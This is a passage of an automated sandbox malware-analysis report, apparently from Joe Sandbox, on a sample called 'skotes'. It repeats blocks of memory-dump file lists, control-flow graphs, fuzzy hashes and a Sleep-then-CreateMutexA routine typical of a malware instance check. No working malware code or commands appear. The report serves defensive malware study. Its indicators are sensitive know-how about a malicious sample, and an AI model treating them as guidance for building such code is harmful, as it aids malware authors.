                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: 8e9aca741eaa894238303c9900143f33e0728c8775bb1c1388cc1c4b4ad6e877
                                                          • Instruction ID: 7a00870bd41a2151887a05420114fba0da79a5a9299ce95a49ec00d18c3237ff
                                                          • Opcode Fuzzy Hash: 8e9aca741eaa894238303c9900143f33e0728c8775bb1c1388cc1c4b4ad6e877
                                                          • Instruction Fuzzy Hash: 8B316A31A001809BEB18AB7DDCC9BADB7F6EFC2314F204298E414DB3D6D7B569848653

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 164 bea54d-bea56d 168 bea56f-bea57b 164->168 169 bea59b-bea5b7 164->169 170 bea57d-bea58b 168->170 171 bea591-bea598 call bfd663 168->171 172 bea5b9-bea5c5 169->172 173 bea5e5-bea604 169->173 170->171 176 bea944-bea949 call c16c6a 170->176 171->169 178 bea5db-bea5e2 call bfd663 172->178 179 bea5c7-bea5d5 172->179 174 bea606-bea612 173->174 175 bea632-bea916 call bf80c0 173->175 181 bea628-bea62f call bfd663 174->181 182 bea614-bea622 174->182 192 bea94e 176->192 193 bea949 call c16c6a 176->193 178->173 179->176 179->178 181->175 182->176 182->181 195 bea953-bea994 Sleep CreateMutexA 192->195 196 bea94e call c16c6a 192->196 193->192 198 bea996-bea998 195->198 199 bea9a7-bea9a8 195->199 196->195 198->199 200 bea99a-bea9a5 198->200 200->199
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: bf4b6dd3acceb032dde962f72011f7196138a6e98219b6e3bc3b5d7fcca74e0c
                                                          • Instruction ID: c98fe5cc8ba519f3bc091a7511265cb0881e9781cb4477446919c9aef9deb788
                                                          • Opcode Fuzzy Hash: bf4b6dd3acceb032dde962f72011f7196138a6e98219b6e3bc3b5d7fcca74e0c
                                                          • Instruction Fuzzy Hash: 33314A316001809BEB08DB7DCCC9B6CB7EAEBC6314F244698E414DB3D6C775A9818713

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 202 bea682-bea6a2 206 bea6a4-bea6b0 202->206 207 bea6d0-bea6ec 202->207 208 bea6c6-bea6cd call bfd663 206->208 209 bea6b2-bea6c0 206->209 210 bea6ee-bea6fa 207->210 211 bea71a-bea739 207->211 208->207 209->208 214 bea949 209->214 216 bea6fc-bea70a 210->216 217 bea710-bea717 call bfd663 210->217 212 bea73b-bea747 211->212 213 bea767-bea916 call bf80c0 211->213 218 bea75d-bea764 call bfd663 212->218 219 bea749-bea757 212->219 222 bea94e 214->222 223 bea949 call c16c6a 214->223 216->214 216->217 217->211 218->213 219->214 219->218 226 bea953-bea994 Sleep CreateMutexA 222->226 227 bea94e call c16c6a 222->227 223->222 234 bea996-bea998 226->234 235 bea9a7-bea9a8 226->235 227->226 234->235 236 bea99a-bea9a5 234->236 236->235
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: 631a93b0f2124f1b6c4b1a2765da8f07bdbf4b4cb5fc4efafc9c2c68f9c92d54
                                                          • Instruction ID: 1b822ef93c029a6ae2e82c331b84ae7fba51e6e0ebcd5827c5ed24698ca75585
                                                          • Opcode Fuzzy Hash: 631a93b0f2124f1b6c4b1a2765da8f07bdbf4b4cb5fc4efafc9c2c68f9c92d54
                                                          • Instruction Fuzzy Hash: C1312A316001849BEB18DB7DDCC976DB7FAEF86310F244698E414D72D6C77569808653

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 238 be9adc-be9ae8 239 be9afe-be9b27 call bfd663 238->239 240 be9aea-be9af8 238->240 248 be9b29-be9b35 239->248 249 be9b55-be9b57 239->249 240->239 241 bea917 240->241 243 bea953-bea994 Sleep CreateMutexA 241->243 244 bea917 call c16c6a 241->244 252 bea996-bea998 243->252 253 bea9a7-bea9a8 243->253 244->243 254 be9b4b-be9b52 call bfd663 248->254 255 be9b37-be9b45 248->255 250 be9b59-bea916 call bf80c0 249->250 251 be9b65-be9d91 call bf7a00 call be5c10 call be8b30 call bf8220 call bf7a00 call be5c10 call be8b30 call bf8220 249->251 252->253 257 bea99a-bea9a5 252->257 254->249 255->241 255->254 257->253
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateMutexSleep
                                                          • String ID:
                                                          • API String ID: 1464230837-0
                                                          • Opcode ID: 0b872fc9ef185470bc91c4fa82dd83611b1eaf754de53cb2ce3b36c65d6b0070
                                                          • Instruction ID: 518a2da56f0f9915f853e8878cfc4b324cf1702c2e40d16f339cf64b74cc7bb4
                                                          • Opcode Fuzzy Hash: 0b872fc9ef185470bc91c4fa82dd83611b1eaf754de53cb2ce3b36c65d6b0070
                                                          • Instruction Fuzzy Hash: 3B214C317042809BEB189B6DECC5B6DF7E6EFC2310F204659E504C72D6DBB569858612

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 315 bea856-bea86e 316 bea89c-bea89e 315->316 317 bea870-bea87c 315->317 320 bea8a9-bea8b1 call be7d30 316->320 321 bea8a0-bea8a7 316->321 318 bea87e-bea88c 317->318 319 bea892-bea899 call bfd663 317->319 318->319 324 bea94e 318->324 319->316 332 bea8e4-bea8e6 320->332 333 bea8b3-bea8bb call be7d30 320->333 322 bea8eb-bea916 call bf80c0 321->322 328 bea953-bea987 Sleep CreateMutexA 324->328 329 bea94e call c16c6a 324->329 335 bea98e-bea994 328->335 329->328 332->322 333->332 339 bea8bd-bea8c5 call be7d30 333->339 337 bea996-bea998 335->337 338 bea9a7-bea9a8 335->338 337->338 340 bea99a-bea9a5 337->340 339->332 344 bea8c7-bea8cf call be7d30 339->344 340->338 344->332 347 bea8d1-bea8d9 call be7d30 344->347 347->332 350 bea8db-bea8e2 347->350 350->322
                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
